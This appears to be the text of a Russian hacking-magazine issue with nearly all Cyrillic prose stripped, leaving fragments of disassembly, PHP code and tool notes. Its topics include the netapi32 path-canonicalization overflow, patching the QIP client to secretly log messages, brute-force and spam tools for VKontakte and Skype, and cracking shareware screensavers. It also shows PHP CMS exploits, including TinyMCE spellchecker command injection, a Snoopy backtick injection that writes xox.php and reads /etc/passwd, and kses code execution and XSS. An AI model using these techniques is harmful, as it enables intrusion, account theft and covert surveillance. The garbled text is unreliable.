    dll, . : XP , exe - , , . , . IDA-Pro - BinDiff PatchDiff, , : http://cgi.tenablesecurity.com/tenable/patchdiff.php. netapi32.dll netapi32_o.dll, IDA-Pro . , netapi32.dll (- netapi32_p.dll), , Edit\Plug-ins, PatchDiff netapi32_o.idb. , PatchDiff , 21 . , ( Graph). , - I_NetPathCanonicalize ( ). . 1. Jump to Code .

    netapi32.dll

    7CD1AA3E push 0 ; char

    7CD1AA40 lea eax, [ebp+UncServerName]

    7CD1AA46 push eax ; Dest

    7CD1AA47 lea eax, [ebp+var_20]

    7CD1AA4A push eax ; int

    7CD1AA4B push [ebp+Buffer] ; Buffer

    7CD1AA4E call NetpIsRemote

    netapi32.dll

    7CD1FB7D push 0 ; char

    7CD1FB7F push 104h ; int

    7CD1FB84 lea eax, [ebp+UncServerName]

    Gimmiv.A, I_NetPathCanonicalize, \..\


    7CD1FB8A push eax ; Dest

    7CD1FB8B lea eax, [ebp+var_20]

    7CD1FB8E push eax ; int

    7CD1FB8F push [ebp+Buffer] ; Buffer

    7CD1FB92 call NetpIsRemote

    ! NetpIsRemote(Buffer, int, Dest, char), NetpIsRemote(Buffer, int, Dest, char, 0x104). , 0x104 , . -, . NetpwPathCanonicalize(), sub_7CD1AB28, :

    7CD1AB53 push [ebp+Source] ; Str

    7CD1AB56 call edi ; __imp_wcslen

    7CD1AB5B cmp eax, ebx

    7CD1AB5D ja short loc_7CD1ABCF

    7CD1AB5F push [ebp+Source] ; Source

    7CD1AB68 push eax ; Dest

    7CD1AB69 call ds:__imp_wcscat

    7CD1AB8D lea eax, [ebp+Str]

    7CD1AB93 push eax

    7CD1AB94 call sub_7CD1ABD9

    7CD1AB9D lea eax, [ebp+Str]

    7CD1ABA3 push eax ; Str

    7CD1ABA4 call edi ; __imp_wcslen

    7CD1ABA6 lea eax, [eax+eax+2]

    7CD1ABB4 lea eax, [ebp+Str]

    7CD1ABBA push eax ; Source

    7CD1ABBB push [ebp+Dest] ; Dest

    7CD1ABBE call ds:__imp_wcscpy

    wcslen()/wcscpy(). bug-free , , /, \ ., - \..\ - :

    7CD1ABD9 sub_7CD1ABD9 proc near

    ; CODE XREF: sub_7CD1AB28+6C^p

    7CD1ABD9

    7CD1ABE0 mov edi, [esp+14h+arg_0]

    7CD1ABE4 push '/'

    7CD1ABE6 pop esi

    7CD1ABE7 xor edx, edx

    7CD1ABE9 mov ax, [edi]

    7CD1ABEC push '\'

    7CD1ABEE pop ebx

    7CD1ABEF xor ebp, ebp

    7CD1ABF1 cmp ax, bx

    7CD1ABF4 mov [esp+14h+var_4], edx

    7CD1ABF8 jz loc_7CD1EB17

    7CD1ABFE cmp ax, si

    7CD1AC01 jz loc_7CD1EB17

    7CD1AC07 loc_7CD1AC07:

    ; CODE XREF: sub_7CD1ABD9+3F51v

    7CD1AC07 test ax, ax

    7CD1AC0A mov esi, edi

    7CD1AC0C jz short loc_7CD1AC2B

    7CD1AC0E loc_7CD1AC0E:

    ; CODE XREF: sub_7CD1ABD9+60vj

    7CD1AC0E cmp ax, bx

    7CD1AC11 jz loc_7CD273A8

    7CD1AC17 cmp ax, '.'

    7CD1AC1B jz loc_7CD273BB

    , , - sub_7CD1ABD9() . - . exploit SRVSVC I_NetPathCanonicalize I_NetPathCompare. , . , 4B324FC8-1670-01D3-1278-5A47BF6EE188:

    I_NetPathType;

    I_NetPathCompare;

    I_NetNameValidate;

    I_NetNameCompare;

    I_NetListCanonicalize;

    I_NetPathCanonicalize

    I_NetNameCanonicalize;

    I_NetServerSetServiceBits;

    I_NetServerSetServiceBitsEx;

    ( ) \..\ - /../, /..\, \../ ( S2k3/S2k8). , . MSDN, - SRVSVC : msdn.microsoft.com/en-us/library/cc213209.aspx. - (hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html) . ! . , shell- . - JMP ESP/CALL ESP (FFE4h/FFD4h), netapi32.dll, . , Windows, . , . - , Metaspoit. DEP, , API-- VirtualAlloc VirtualProtect, ( Google return2libc). exploit . . , / , shell-, - . DVD. z

    MS HIEW

  • -

    , -

    , ,

    , .

    ,

    , -

    - QIP.

    qip

    Cr@wler

    Easyhack , - QIP , MessageBoxA. , , , , QIP . , . qip.exe , . , , - OllyDbg. , , QIP . . , - QIP , . , , : - nop . , . :). , - PE- ( , , ) -, . , : 068F4BA PE-

    . , . :

    0048023F . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]

    00480242 . 807D FB 00 CMP BYTE PTR SS:[EBP-5],0

    00480246 74 0F JE SHORT qip_modi.00480257

    00480248 E8 B740F8FF CALL qip_modi.00404304

    , - , . 00480246 . : . , , - CALL 00404304, ( , - Undo Selection). nop . - , , Undo Selection, . , , ? . , . , - . , - - , , !

  • , , - - - . , - , , - .

    warning


    , EBX ( , , ; ) 0064ED7C. , , , -. , 0068F857. , 00480248, .

    00480248 jmp 0068f857

    , , 0048024D . :

    0068F857 CMP EBX,0064ED7C ; -

    ebx ,

    0068F85D JNZ 0068F864 ; -

    0064ED7C, ...

    0068F85F JMP 0048024D ; ...

    ( qip.exe)

    0068F864 PUSH 0048024D ;

    ...

    0068F869 JMP 00404304 ; ...

    , , ! , : - -.

    , , - . ,

    , API-: . MSDN, . CreateFileW. ( , ):

    hTemplateFile -,

    ;

    Attributes ;

    Mode ;

    pSecurity ;

    ShareMode ;

    Access ;

    , ,


    FileName .

    ( ). WriteFile. :

    BOOL WINAPI WriteFile(

    __in HANDLE hFile,

    __in LPCVOID lpBuffer,

    __in DWORD nNumberOfBytesToWrite,

    __out_opt LPDWORD lpNumberOfBytesWritten,

    __inout_opt LPOVERLAPPED lpOverlapped

    );

    :

    hFile ;

    Buffer , ;

    nNumberOfBytesToRead ;

    lpNumberOfBytesRead

    ;

    lpOverlapped OVERLAPPED

    ().

    , , 0068F86E. -. ( , , EASYHACK 2008 ), , , ( [ebp-8]) :

    00649A01 CALL qip.004678B4

    00649A06 CMP DWORD PTR SS:[EBP-8],0

    00649A0A JE SHORT 0649A2F

    , , CALL-, , ( cmp je). - , :

    00649A01 CALL qip_modi.004678B4

    00649A06 JMP 0068F86E

    00649A0B NOP

    ? . 0068F86E - .1. CreateFileW -. API EAX .

    0068F86E > 6A 00 PUSH 0 ; /hTemplateFile = NULL

    0068F870 . 68 80000000 PUSH 80 ; |Attributes = NORMAL

    0068F875 . 6A 04 PUSH 4 ; |Mode = OPEN_ALWAYS

    0068F877 . 6A 00 PUSH 0 ; |pSecurity = NULL

    0068F879 . 6A 03 PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

    0068F87B . 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE

    0068F880 . 68 A7F86800 PUSH qip_modi.0068F8A7 ; |FileName = "log.txt"

    0068F885 . E8 D60E187C CALL kernel32.CreateFileW ; \CreateFileW

    2. EAX CloseHandle, .

    0068F88A . 50 PUSH EAX ; /hObject

    3. WriteFile . , , - API-: , . , 0068F8EB. , VirtualProtect NewProtect = PAGE_EXECUTE_READWRITE. VirtualProtect 0068F8B7 ( PUSHAD). MOV , , 0068F8EB. :

    ; WriteFile :

    0068F88B PUSH 0 ; |/pOverlapped = NULL

    0068F88D PUSH EBP ; ||pBytesWritten

    0068F88E PUSH 10 ; ||nBytesToWrite = 10 (16.)

    0068F890 PUSH qip_modi.0068F8EB ; ||Buffer = qip_modi.0068F8EB

    0068F895 PUSH EAX ; ||hFile

    0068F896 CALL kernel32.WriteFile ; |\WriteFile

    ; CloseHandle ,

    "PUSH EAX", -

    0068F88A:

    0068F89B CALL CloseHandle

    ; ,

    VirtualProtect :

    0068F8A0 POPAD

    ; qip.exe

    0068F8A1 JMP qip_modi.00649A0B

    ; , CreateFileW:

    0068F8A6 NOP

    0068F8A7 UNICODE "log.txt",0

    ; :

    0068F8B7 PUSHAD

    ; VirtualProtect

    :

    0068F8B8 PUSH 32F7D0 ; /pOldProtect = 0032F7D0

    0068F8BD PUSH 40 ; |NewProtect = PAGE_EXECUTE_READWRITE

    0068F8BF PUSH 0FF ; |Size = FF (255.)

    0068F8C4 PUSH qip_modi.0068F8EB ; |Address = qip_modi.0068F8DD

    0068F8C9 CALL kernel32.VirtualProtect ; \VirtualProtect

    ;

    , 0068F8EB:

    ; 4 ...:


    0068F8CE MOV ECX,DWORD PTR DS:[EBP-8]

    0068F8D2 MOV EDX,DWORD PTR DS:[ECX]

    0068F8D4 MOV ECX,qip_modi.0068F8EB

    0068F8D9 MOV DWORD PTR DS:[ECX],EDX

    ;... 4 :

    0068F8DB MOV ECX,DWORD PTR DS:[EBP-8]

    0068F8DF MOV EDX,DWORD PTR DS:[ECX+4]

    0068F8E2 MOV ECX,qip_modi.0068F8EF

    0068F8E7 MOV DWORD PTR DS:[ECX],EDX

    ;

    , -:

    0068F8E9 JMP SHORT qip_modi.0068F86E

    . :

    00649A06 JMP 0068F86E

    , - VirtualProtect, - . 0068F8E9 :

    00649A06 JMP 0068F8B7

    ! , . VirtualProtect , . WriteFile, - , . , . , , .

    , ! , --, . -, , , -. -, . , . , , QIP, - - . : -, QIP, , . (, ) . - , . . ! z

    QIP . :)

  • BBS, , . , -

    , .

    .

    . -

    . , , .

    , ? - -

    . - - . , . , , . : - ? ? . , , . !

    ? , . , , , . :1. ( , : , , , , / ). , - . .2. ( ,


    Balashek

  • ). - , . .3. ( , , , ).4. (, , ). - . , , . , ( ) . . - .

    /// , www.vkontakte.ru www.odnoklassniki.ru, - -. ///- . - ( ), -. , , , . - Chaaka Vkontakte PM spamer. - , :). :

    , [name]

    [lastname]

    Ajax

    , - 777 : [name] . [lastname] .

    [:] ( , , 1 ). cURL , -. , :). , Vkontakte.ru TOOLs Smapt. . - - : 1 / 70 - 50 . , - vkontakte.ru bruteforce with multi-threads C!klodoL. :1. ActivePerl .2. :

    $dic = 'passl.txt'; #

    $id = 111111; #id

    $mail = 'mail%40mail.com'; #, @

    %40

    $threads = 4; #

    3. .


    -/ , - - - .

    - - . !

    info

  • 4. good.txt . . Odnaklassniki cheker Vid0k, PHP. , ( DVD). , , - (, , , -). , . ( ). , , . . ( ). :1. ID . . http://vkontakte.ru/friend.php?id=. id= ID .2. : : http://vkontakte.ru/photos.php?act=user&id=.: http://vkontakte.ru/photos.php?id=.: http://vkontakte.ru/video.php?id=.: http://vkontakte.ru/notes.php?id=.

    : http://vkontakte.ru/opinions.php?id=. , ! , , , , :http://vkontakte.ru/infested_ip_list.html. IP-, 100% ( -) DDoS vkontakte.ru. The List of 17029 Infested IP Addresses:


    , , IP - :). - :

    http://vkontakte.ru/test.html

    http://vkontakte.ru/admin.html

    http://vkontakte.ru/captcha.php

    http://vkontakte.ru/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

    , , :). . z

    ! - ! , - !

    warning

    :)

    IP DDoS

    Vkontakte Tools


  • -

    , . ,

    , , ,

    -

    .

    .

    , ( , ). Win-

    z, !. -, 3D- . - 3D- , Win-. 3D , Windows ( , ) WinApi . , SendMessage .3D 3D-, , , . , , , . , - ( , - ..). -

    , . , - . , - , MD5, RSA , ( ) . , . ( , -) . , , . user mode (OllyDbg, MS Dbg) 3D-.

    , . 3D-, 3D-, , (OpenGL), (OpenGL) . : -


    _a1!3N


    , ( , , , , , , ) -. , :

    1. API-,

    (glOrtho);

    2. API-,

    (glEnable(GL_BLEND), glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA), glColor4f...);

    3. -

    .

    , . , - Screensaver download ! - :). , Windows , System32, *.scr , ... !

    OpenGl ElectriCalm 3D Screensaver. IDA ( , , , ). . -

    PE Executable (*.scr *.exe). , , Imports. gl_ , OpenGL. glOrtho. DATA XREF: , glOrtho. .

    .data:0043A2CC glOrtho dd ? ; DATA XREF: sub_405350+44

    , ( IDA sub_405350) 0x405350. ? - glOrtho, , N Rename Call_Ortho. CODE XREF: , , , , Call_Ortho.

    ; CODE XREF: sub_403C10+E02

    ; sub_405110+2A

    (sub_403C10+E02) - :

    004049DC push 0BE2h ;.

    004049E1 call glEnable ;glEnable(GL_BLEND);

    004049E7 push 303h

    004049EC push 302h ;. . (- )

    004049F1 call glBlendFunc ;glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA);

    004049F7 mov ebx, [ebp-34h]

    004049FA push ebx ; (- )

    004049FB push 0

    004049FD push 0

    004049FF push 0 ;. . ALPHA

    00404A01 call glColor4f ;glColor4f(RED,GREEN,BLUE,ALPHA)

    00404A07 push 0DE1h ;.

    00404A0C call glDisable ;glDisable(GL_TEXTURE_2D)

    00404A12 call Call_Ortho ;glOrtho... . .

    00404A17 push 7 ;

    00404A19 call glBegin ;glBegin(GL_QUADS)

    , . , , , . - (glDisable(GL_TEXTURE_2D)) , . push 7 0x00404A17 push 0, glBegin(GL_POINTS). OpenGL , . glBegin . OpenGL, . OllyDbg, - Hiew. Hiew ElectriCalm 3D Screensaver.scr , . 0x00404A17, , , PE-, . . (6A 07) - push 7. , 6A 00. . (, , OpenGL , ), - . ,

    ! -, , -. sub_405110 ( PrintStringLine), - , . , Call_Ortho, , , . ( , , , , ..). . . , ( NOP 0x90, push...) - (glBegin, glVertex). glVertex3f x, y, z. - (, 0), 3D-: - . : glColor4f --, 0.0 1.0 :

    004049F7 mov ebx, [ebp-34h] ; -

    [ebp-34h] EBX

    004049F7 xor ebx, ebx ;

    EBX (EBX = 0) = 0

    NOP. - -, -. ASSEMBLER, OllyDbg. :1. OllyDbg, ElectriCalm 3D Screensaver.scr.2. 004049F7.3. , xor ebx, ebx. (OllyDbg NOP ).4. Copy to executable All modifications.5. Copy all.6. Save file c- . 3D Formula 1 Screensaver. . glOrtho, , CallOrtho - , . Color4f Vertex3f. , . , . : , , . , OpenGL,


    OpenGL-

    Hiew

  • (RenderFunc IDA) API- SwapBuffers glutSwapBuffers, -- glut, - Windows - . SwapBuffers, . - , , ( , ). SwapBuffers :

    extrn SwapBuffers:dword

    ; DATA XREF: sub_406320+281

    ; sub_417379+6FC

    , . - :

    00417A3F test ecx, ecx

    00417A41 jnz short loc_417A54

    ; >


    - - (, - - - , , - , NOP 0x90...):1. . - Windows 95.2. . . -.3. ., ., . OpenGL. -.

    info

    3D-

  • 00403C44 call sub_401390

    00403C49 mov eax, ds:dword_4A0854

    00403C4E mov ecx, [eax]

    00403C50 push eax

    00403C51 call dword ptr [ecx+18h]

    00403C54 mov edx, ds:dword_4A085C

    00403C5A imul edx, 4CCh

    00403C60 mov eax, ds:dword_49ACD4[edx]

    00403C66 test eax, eax

    00403C68 mov eax, ds:dword_4A0844

    00403C6D jnz short loc_403C8B ;(3)

    00403C6F mov ecx, [eax]

    sub_401110, 0x00403C3D, -, API- (ExtTextOut, SetTextColor...), , UNREGISTERED VERSION!, Press the space bar to find out. -? , . sub_401390 0x00403C44. Remaining time: %u sec.. -, . - , , Jnz (1) ; : 75 EB. Atlantis 3D Screensaver. , ( 0x0042414F). , -

    ( WinAPI) On_Idle ( 0x004241B3). RenderFunc. ... :

    0042839A call dword ptr [eax+4Ch]

    ? , EAX. :

    00428392 mov edx, [ebp+var_C] ; EDX -

    var_C=ebp-0Ch

    00428395 mov eax, [edx] ; EAX -

    var_C, On_Idle:

    004281CC mov [ebp+var_C], ecx ; -

    [ebp+var_C] On_Idle

    , ECX, -

    , ..

    , ECX.

    004241AD mov ecx, [ebp+var_4C8] ; ECX

    ? :

    00423EA4 mov [ebp+var_4C8], ecx ; -

    [ebp+var_4C8] sub_423E9B

    ECX (sub_423E9B) . , :


    DirectX

  • 0044C395 mov ecx, offset unk_56EF30 ; ECX

    unk_56EF30

    ! , - , ASSEMBLER. , ECX , this ++, , , ( = (this+4Ch)). , , , ? this=unk_56EF30 . , . OllyDbg, , 0x0056EF30 ( , Go to Expression, 0056EF30) 0x18744900. Intel ( ), 0x00497418, 0x00497418 + 0x4C = 0x00497464, , , 0x00454a87 . IDA: sub_454A87 , , . , , NOP. , . . Call. -- , -, . ( ), , ! (0x00454B0C) (0x00454B08), . -, , , FPS. - , . ! sub_428670 , 3 . . : -, , . - . , , , , ( ). IDA . -, . , , -, . , .

    00429712 jz loc_429A91

    , . :

    004292C3 jz loc_429680

    ! Christmas Time 3D Screensaver . , On_iDle RenderFunc . . , , , , - . IDA, On_Idle. , 0x0041295F. , - , . , On_Idle inline-, - . , On_Idle , - RenderFunc. RenderFunc : Jcc 0x00413344. , , . 0x004132DC, 0x004132EE. , . Jcc 0x00413282, ! , - RenderFunc. . sub_406C07 , , RenderFunc. sub_4091FA, 50 , , Bliss, Lamp_off01.tga... - , 0x0040AA18.

    ?, , (- ) 3- -. , , - ( , ) , , , ASProtect. stripper. - 3D- , - , - . : . , 3D-. z


    IDA !

  • PHP-

    WordPress, Joomla, Drupal, Moodle , , -

    CMS, PHP. , -

    -: kses, Snoopy SpellChecker

    TinyMCE?

    ,

    : XSS code exec. -

    ,

    CMS.


    / icq 884888, http://wap-chat.ru /

    code exec WYSIWYG- TinyMCE. TinyMCE , , , WordPress 2.0.x-2.7.x ./wp-includes/js/tinymce/plugins/spellchecker. : - Google, PHP- PSpell, win- nix- aspell. config.php :

    , , TinyMCE. , - $config[general.engine] = PSpellShell; . . RPC- ( 3 TinyMCE 2.5 - WordPress, POST GET-). lang ./wp-includes/js/tinymce/plugins/spellchecker/classes/

    PSpellShell.php:

    function _getCMD($lang) {

        $this->_tmpfile = tempnam($this->_config['PSpellShell.tmp'], "tinyspell");

        if(preg_match("#win#i", php_uname()))

            return $this->_config['PSpellShell.aspell'] . " -a --lang=". $lang . " --encoding=utf-8 -H < " . $this->_tmpfile . " 2>&1";

        return "cat ". $this->_tmpfile ." | " . $this->_config['PSpellShell.aspell'] . " -a --encoding=utf-8 -H --lang=". $lang;

    }

    evil- JSON-. POST-, rpc.php, :

    {"method":"getSuggestions","params":["en; _EVIL_-

    "]}

    , , :). .

    , - , Snoopy PHP-, -. , , . (http://google.com/codesearch), - WordPress, TikiWiki, Xoops , , . _httpsrequest():

    function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")

    {

        ...

        $safer_URI = strtr( $URI, "\"", " " ); // strip quotes from the URI to avoid shell access

        exec($this->curl_path." -D \"$headerfile\"".$cmdline_params." \"".$safer_URI."\"",$results,$return);

        ...

    }

    WordPress escapeshellcmd. , ?1. evil- $URI, - ;2. evil- exec. , , , , - ? ! backticks ( ). - :

    echo "`id`"

    'id', -

    id. , - XOOPS.

    , xoops-1.3.10 ( ) :1. ./html/class/snoopy.class.php, - _httpsrequest() fetch();2. ./class/phpsyndication.lib.php :

    require(XOOPS_ROOT_PATH."/class/snoopy.class.php");

    ...

    function getData($forcecache=false)

    {

    ...

    $snoopy = new Snoopy;

    ...

    $snoopy->fetch($this->sourceUrl);

    $data = $snoopy->results;

    ...

    }

    function getHtml($fromcache=false)

    {

    $data = $this->getData($fromcache);

    ...

    function getTitle($fromcache=false)

    {

    $data = $this->getData($fromcache=false);

    getTitle() getHtml();3. ./html/modules/headlines/blocks/headlines.php :


    wiki.moxiecode.com/index.php/TinyMCE:Plugins/spellchecker wiki SpellChecker - TinyMCE.

    securityfocus.com/bid/31887 Snoopy advisory.

    snoopy.sourceforge.net Snoopy.

    www.securityfocus.com/archive/1/414573 Advisory Xoops, Snoopy.

    xoops.ru - Xoops.

    links


    , getTitle() getHtml(). :1. headlinesurl https://'echo '' >> xox.php'

    ( headlines; , );2. XOOPS headlines URL;3. , http://victim.com/xoops-1.3.10/html/class/

    xox.php?cmd='cat /etc/passwd'. , Snoopy , , , - . .

    - kses (PHP- ).Kses , WordPress, Moodle, Drupal, eGroupware, Dokeos, PHP-Nuke, Geeklog . code exec preg_replace /e:

    function kses_bad_protocol_once($string, $allowed_protocols){

        return preg_replace('/^((&[^;]*;|[\sA-Za-z0-9])*)'.

            '(:|&#58;|&#[Xx]3[Aa];)\s*/e',

            'kses_bad_protocol_once2("\\1", $allowed_protocols)',

            $string);

    }

    (, phpinfo) kses_bad_protocol_once() - :

    H4ck

    , WordPress , , , wp_kses_normalize_entities() : & &

    $string = str_replace('&', '&amp;', $string);

    WordPress , . - , . - , . , , Moodle. . :

    $injection_points = array(

        'blocks/rss_client/block_rss_client_error.php' => array('error'),

        'course/scales.php?id=1' => array('name', 'description'),

        'help.php' => array('text'),

        'login/confirm.php' => array('data', 's'),

        'mod/chat/gui_basic/index.php?id=1' => array('message'),

        'mod/forum/post.php' => array('name'),

        'mod/glossary/approve.php?id=1' => array('hook'),

        'mod/wiki/admin.php' => array('page'),

    SpellChecker TinyMCE

    - :

    $value = '';

    eval() :). code exec , XSS. - phpMyFaq , XSS kses . .

    xSS kses javascript kses_bad_protocol_once2(). urldecode() %0B ( ) %08 ( ). PoC ( ):

    (Opera) lol

    (Firefox) test

    ! kses style, kses XSS, CSS. :

    (Firefox) test

    . , , advisory , . z

    Snoopy XSS WordPress kses

    WP kses


  • PE--

    , Win32

    . , -

    , . ,

    , / -

    IDA Pro.

    , , - Potable Executable (, , PE).

    . , , (, ). , . ntoskrnl.exe, /-/. , , Windows ( wine) , , . ( ) crackme (kpnc.org/ftp/KedaH3.zip), (IDA Pro, OllyDbg, HIEW, etc). , - .

    PE- , (raw) . , : , . (physical) (virtual). , , , PE-, - . ( ) , - , , / . , , (Virtual Size Physical Size) . , - , PE-. , 10h , 100h, / 1000h. , , 10h . -


  • ( , , PE- ). , , 10h , ... ? - , . . , 10h . -, . , . , IDA Pro ( 5.3 ), HIEW, DUMPBIN .

    , , . . ( ), . . , , , , . , - . , ( W2K, S2K3 XP), - .no pain no gain. : condom-principle: itd rather have one and not need it that need it and not have one., condom , . , crack-me MessageBoxA. HIEW , ; , HEX-mode () (Header), (Entry). ... ! , . , . , 401010h, 10h

    .text, , .! HIEW ! - . : The input file contains non-empty TLS (Thread Local Storage) callback table. However, IDA Pro couldnt find the TLS callback procedures in the loaded code - TLS callback, IDA Pro TLS callback . , , - .

    KedaH3.exe ida Pro - Retn,

    .text:00401000 _text segment para public 'CODE' use32

    .text:00401000 assume cs:_text

    .text:00401000 ;org 401000h

    .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

    .text:00401000 retn

    .text:00401000

    .text:00401001 dd 3 dup(?)

    .text:0040100D db 3 dup(?)

    .text:00401010 public start

    .text:00401010 start dd 8 dup(?)

    .text:00401010 _text ends

    , , RET, , - . MessageBoxA? ? ! TLS Callback , , , . KedaH3.exe , ... . , , , - , 100% . . ( , ), , , , .


    KedaH3.exe 100%

    HIEW

    , IDA Pro KedaH3.exe

    KedaH3.exe, ,

  • , KedaH3.exe ( ) , , Windows.

    HIEW. , - HEX- . / , / HEX-. . ( , ?) , . , ( 401000h) - . - , (RETN) , HIEW . . , HIEW , , , . - crack-me HIEW . HIEW , ., , . , . , ENTER, Manual Load, Load File of New Format, . - , ! IDA Pro 5.2 -, 5.3, , , .

    KedaH3.exe, ida Pro 5.3

    00401010 public start

    00401010 start proc near

    00401010 dec eax

    00401011 retn

    00401011 start endp

    00401011

    00401012 loc_401012:

    ; CODE XREF: .text:00401049vj

    00401012 push offset a_noPainNoGain_

    ; " .no pain no gain. "

    00401017 push offset unk_403018

    0040101C push 0

    0040101E call ds:MessageBoxA

    00401024 xor eax, eax

    00401026 mov eax, [eax]

    00401028 db 65h

    00401028 jp short near ptr dword_4010A0

    0040102B insd

    00401030

    00401030 public TlsCallback_0

    00401030 TlsCallback_0:

    ; CODE XREF: .text:0040103Bvj

    00401030 mov esi, esp

    00401032 lodsd

    00401033 lodsd

    00401034 mov al, 10h

    00401036 mov ah, al

    00401038 xchg eax, esi

    00401039 lodsb

    0040103A dec eax

    0040103B jnp short TlsCallback_0

    0040103D xor eax, eax

    0040103F push eax

    00401040 mov al, 30h

    00401042 mov esi, fs:[eax]

    00401045 inc esi

    00401046 dec byte ptr [esi+1]

    00401049 jnp short loc_401012

    0040104B xor eax, eax

    0040104D mov eax, [eax]

    0040104D

    0040104D ; -------------------------------------------

    00403000 a_noPainNoGain_ db ' .no pain no gain. ', 0

    ; DATA XREF: loc_401012^o

    00403018 aCondomPrincipl db 0Ah

    ; DATA XREF: .text:00401017^o

    00403018 db 'condom-principle',0Ah, 0Ah

    00403018 db 9,'it',27h,'d rather have one and not need it... '


    (manual load) , IDA Pro 5.3

    HIEW , ,

    KedaH3.exe HEX- , - , -

    00403071 TlsIndx db 'http://kpnc.org',0

    ; DATA XREF: .data:TlsIndex_ptrvo

    00403090 TlsDirectory dd offset TlsDirectory

    ; DATA XREF: .data:TlsDirectoryvo

    00403094 TlsEnd_ptr dd offset TlsDirectory

    00403098 TlsIndex_ptr dd offset TlsIndex

    ; "http://kpnc.org"

    0040309C TlsCallbacks_ptr dd offset TlsSizeOfZeroFill

    004030A0 TlsSizeOfZeroFill dd offset TlsCallback_0

    004030A4 TlsCharacteristics dd 0

    ... . DEC EAX/RET, . , , . ( , ?), TLS callback , , TLS callback crack-me ! , - , . , , 00401049 jnp short loc_401012 - , ., CALL ds:MessageBoxA XOR EAX, EAX/MOV EAX, [EAX], . , SEH- ( ) , - ... . ! ? . , . , ? . . PAUSE - - . , , TLS callback crack-me, - , , ( , ).

    . KedaH3.exe , - (Pause), TLS Callback (Goto), 401030 ( TLS Callback - IDA). 401030 Breakpoint, Hardware, on execution. Debug Hardware breakpoints, , , (Restart), Yes TLS Callback, ! IDA Pro Debugger ( 5.3). TlsCallback_0, . ! - , . . , , (, ?), !

    . . ( ) . - :

    1. -

    2. XOR EAX, EAX/MOV EAX, [EAX]

    RET

    3. PE- -

    /

    condom-principle... http://kpnc.org, , . : MessageBoxA URL? , , Windows ... -, . , , , crack-me .z


    Microsoft Portable Executable and Common Object File Format Specification: microsoft.com/whdc/system/platform/firmware/PECOFF.mspx.

    KedaH3 Crack Me: kpnc.org/ftp/KedaH3.zip.

    links

    KedaH3.exe IDA Pro 5.3 ( )

    KedaH3.exe


    : SkyPe Bruter : *nix/win: mr.the

    - - Skype-, . , Skype- $1. , : . , Skype Bruter, - :). PHP curl. base.txt : https- proxy.txt. , :

    base.txt

    :

    log.txt

    ua.txt (

    )

    proxy.txt -

    sk.php

    , , : ,

    . :).P.S. PHP . , , .

    : inVizer: windowS 2000/xP: & Jah

    . , , ? :). , - InVizer. ICQ- :

    1. ( -

    log.txt)

    2. icq--

    3. timeout (

    -

    )

    4. -

    ( )

    5. /

    6.

    7.

    8.

    9.

    10.

    11.

    / / . . . ! GUI-- , , !

    : StaffCoP: windowS 2000/xP: StaffCoP.ru

    /- -, :). StaffCop, . , , / . :1. . , ,

    r0id


    - , -. .2. . . - , . .3. -. - - . URL-, ( title), - . , :). , -, , .4. ICQ MSN Messenger. IM (ICQ MSN) UIN ICQ MSN, , ( ), . .5. USB-. - , USB-, .6. . - / (aka ) . . .7. . (aka ) . , - Windows :). , - , , , . , , , - .

    : GetBrute: windowS 2000/xP: dimaS URL, - -. , . GetBrute, - GET- url. aka data.ini, :1. [connection]: url ( * , ^ ). HandleRedirects 0 1 1, 403.


    , /PHP, , Find proxies for Me, . , :

    1. (

    txt/html/htm/mht

    , )

    2. -

    (

    )

    3.

    4.

    5. -

    IP (

    IP aaa,bbb,ccc,ddd

  • Mifrill


    -, ... , . - . , . -, , . . - , . , , . , - ! , -

    MUD , , - . : - ( mmorpg massively multiplayer online role-playing game) . World of warcraft, Lineage II, EVE online - () Second Life. , , - - Sims, , . ,

    Web 2.0. -

    . , ,

    , Web 2.0 -

    . , ,

    ,

    . , ...


  • Second Life , BusinessWeek The Economist. , , , . , . - (Philip Rosedale). , , . , , , - , , - , . , 6-7 - ( Apple II) . 17 . - . 1994, , - . , , -. , . , , . - , , , ! , - . 90- 3D , , , , (, Second Life ). . , . , - , -. , , , . , , , , . , -.

    , . FreeVue, . , RealNetworks (Rob Glaser), 1996- . , , RealNetworks. , , , , . , , . , - , , . 1999-. , , RealNetworks, Linden Alley . , Linden Labs, . - (Andrew Meadows), ... . , . , , , - , , - . ( ), . , , . - , - . . - - . , , . , Second Life , . ( -\) . , ; , , , . , - ?.. Second Life , . , , , , . , Second Life . ( 2003 ) Linden Labs , . 31- , . , 11, . , . , , , , , , .


    2008 Second Life Technology & Engineering Emmy Awards

  • , , , - , , . , - , . Second Life -, , , , . Second Life , , , . - . , Second Life - , . , , , , -. , : , !, . - Linden Labs Linden, ( - ). - . Second Life , - , . , . - , , , , , , . , - 3D- Second Life . 2003- , ,

    , , , . , , , . , - , , . , Linden Labs , -, , , . . , , : , , , . , ,

    -, . , , .

    , Second Life , , . -, ? , , , Linden Labs . , , -, Linden Labs -


    Second Life Ginko Financial,

    $700.000 .

    Linden Labs , -

    ( ),

    -

    ,

    .

    . ,


    , , . , , , , . - , . -

    , , . - , . . , , , -

    , . . , Second Life . -, , 15 ., , . - , , . ; 45-50 . . Second Life , , ... , . Second Life - - ( Linden Labs. , - ). , . , - , . - , . . , Second Life - (L$) - . , 280 . , 2008 , - , 22- . , Linden Labs , , . , 2007 . Second Life Ginko Financial, $700.000 . Linden Labs , ( -), , . , - Linden Labs. , , 2007 . , , Linden Labs - , - . - , . , , , , . Dell Sun 2007 . . , , . , Second Life 2006-2007 , , -, ( Reebok). , , Second Life . , - . , Second Life

    ,


    , . , , , , . , ,

    , , -. Second Life : , , , , -, , , -. , , , Second Life , . Linden Labs , L$ , , . - , . , , :). , , , . , Second Life . , , . , , . , Linden Labs. , , , , PG , . ( , , ) ID, -

    . , , (sic!) , , . , . . , , . -, Second Life. , . , 300 , , Linden Labs - . , . , - . , . , -, . 5 10, , - .

    Second Life, , . , . , -, , - . , , , Second Life , , . , , , - , , -, , , . , Second Life , , . , -, . - , , Second Life . - - , , . . , . , , - . , , . , , , . - , , , . z

    , SL ,

    Second Life

